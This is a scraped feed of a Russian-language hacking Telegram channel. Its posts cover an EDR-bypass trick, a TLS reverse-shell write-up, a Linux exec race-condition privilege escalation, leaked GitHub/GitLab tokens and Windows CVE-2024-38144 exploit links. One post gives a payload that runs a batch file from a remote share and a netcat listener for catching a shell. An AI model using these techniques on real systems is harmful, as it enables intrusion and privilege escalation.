This media is not supported in your browser
VIEW IN TELEGRAM
XSS в 2024
и смешно и грустно
и смешно и грустно
🔥147👍21😱18
bypass EDR
*
payload
+ еще decimal можно
*
payload
https://&cmd/c\\\\192.168.2.15\\Public\\aa.bat
nc -lvnp 4444
+ еще decimal можно
👍26😱9🔥6
Linux Malware Development:
Создание reverse shell на основе TLS/SSL на Python
*
writeUP
*
source: reverse_ssl.py
Создание reverse shell на основе TLS/SSL на Python
*
writeUP
*
source: reverse_ssl.py
🔥24👍2
Kernel (Linux) _#
*
В ядре Linux в системных вызовах
Есть два состояния бинаря (условно), которые должны быть безопасными:
1. Бинарь имеет root-идентификатор +
2. Бинарь не имеет руть идентификатора, потому может быть выполнен хакером.
*
А вот тут то и впрягается состояния гонки, как и в реальном мире, старичок бит может не успетьвыпить таблетки
*
Proof of Concept
#LPE #linux #ricecondition #kernel
*
В ядре Linux в системных вызовах
exec существует проблема времени проверки/времени использования. Разрешения на выполнение проверяются в другое время, чем применяется бит set-user-ID. Это LPE.Есть два состояния бинаря (условно), которые должны быть безопасными:
1. Бинарь имеет root-идентификатор +
set-user-ID, но хакеру его не исполнить.2. Бинарь не имеет руть идентификатора, потому может быть выполнен хакером.
*
А вот тут то и впрягается состояния гонки, как и в реальном мире, старичок бит может не успеть
*
Proof of Concept
#LPE #linux #ricecondition #kernel
🔥18😱4👍3
Рубрика
*
Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа.
Токены обеспечивают доступ к:
108 707 репозиториям кода.
2117 организациям/группам.
*
Список юзеров у которых увели токен с GitHub
Список юзеров у которых увели токен с GitLab
*
Ищем себя ))
Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с
.git leaks*
Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа.
Токены обеспечивают доступ к:
108 707 репозиториям кода.
2117 организациям/группам.
*
Список юзеров у которых увели токен с GitHub
Список юзеров у которых увели токен с GitLab
*
Ищем себя ))
Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с
Gi7w0rm , добряки )))👍29😱6🔥5
Media is too big
VIEW IN TELEGRAM
Группа Nanowar of Steel создала гимн Java, текст которого полностью состоит из кода
*
github.com/NanowarOfSteel/HelloWorld
#metall #friday #party
*
github.com/NanowarOfSteel/HelloWorld
#metall #friday #party
🔥26😱7👍1
CVE-2024-38144
*
LPE vulnerability in Windows 11 due to Integer Overflow in ksthunk.sys
*
Перспективненько
*
WriteUp + exploit
WriteUp + exploit 2
*
LPE vulnerability in Windows 11 due to Integer Overflow in ksthunk.sys
*
Перспективненько
*
WriteUp + exploit
WriteUp + exploit 2
🔥17👍2
